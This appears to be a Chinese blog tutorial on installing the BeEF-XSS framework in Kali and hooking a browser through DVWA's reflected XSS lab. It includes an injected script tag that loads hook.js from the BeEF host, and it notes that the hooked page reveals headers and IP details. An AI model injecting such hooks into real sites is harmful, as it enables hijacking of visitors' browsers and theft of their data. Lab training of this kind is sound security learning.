在kali环境下安装Beef-Xss靶场搭建

目录

一、更新安装包

二、安装beef-xss

三、启动Beef-Xss工具

1、查看hook.js

2、查看后台登录地址

3、查看用户名和登录密码

4、登录页面

[5、点击 Hook me:将配置的页面导入BEEF中](#5、点击 Hook me:将配置的页面导入BEEF中)


一、更新安装包

┌──(root㉿kali)-[/home/kali]

└─# apt-get update

二、安装beef-xss

┌──(root㉿kali)-[/home/kali]

└─# apt-get install beef-xss

三、启动Beef-Xss工具

第一次启动会提示你需要输入密码

1、查看hook.js

http://192.168.17.130:3000/hook.js

可见代码之复杂,功能之多

2、查看后台登录地址

http://192.168.17.130:3000/ui/authentication

3、查看用户名和登录密码

┌──(root㉿kali)-[/home/kali]

└─# cd /usr/share/beef-xss

┌──(root㉿kali)-[/usr/share/beef-xss]

└─# ls -al

┌──(root㉿kali)-[/usr/share/beef-xss]

└─# vim /etc/beef-xss/config.yaml

4、登录页面

5、点击 Hook me:将配置的页面导入BEEF中

在DVWA的反射型XSS中注入BEEF配置页面hook.js

<script src="//192.168.17.130:3000/hook.js">

提交后:

此时BEEF中监控已经上线:

可获取http请求头,服务器类型,IP地址等信息

攻击连接意图:

相关推荐
dal118网工任子仪10 小时前
web安全漏洞之xss(1)
笔记·学习·web安全·网络安全·xss
Wh1teR0se10 小时前
ctfshow(328)--XSS漏洞--存储型XSS
前端·xss
IT猫咪酱12 小时前
XSS过滤器Filter实现
java·springboot·xss
网络安全指导员12 小时前
渗透利器-kali工具 (第三章-6) Xss漏洞学习之-Beef-Xss
前端·网络·学习·web安全·xss
Tronlongtech17 小时前
干货!基于RK3568的 AI 人工智能环境搭建步骤
人工智能·教程·环境搭建·rk3568
黑金IT1 天前
Laravel 安全实践:如何防止 XSS 攻击
安全·php·laravel·xss
Wh1teR0se3 天前
反射型XSS--理论
web安全·网络安全·xss
Wh1teR0se3 天前
ctfshow(316,317,318)--XSS漏洞--反射性XSS
web安全·xss
Wh1teR0se4 天前
XSS漏洞--常用payload及绕过
web安全·网络安全·xss
独行soc4 天前
#渗透测试#SRC漏洞挖掘#深入挖掘XSS漏洞02之测试流程
web安全·面试·渗透测试·xss·漏洞挖掘·1024程序员节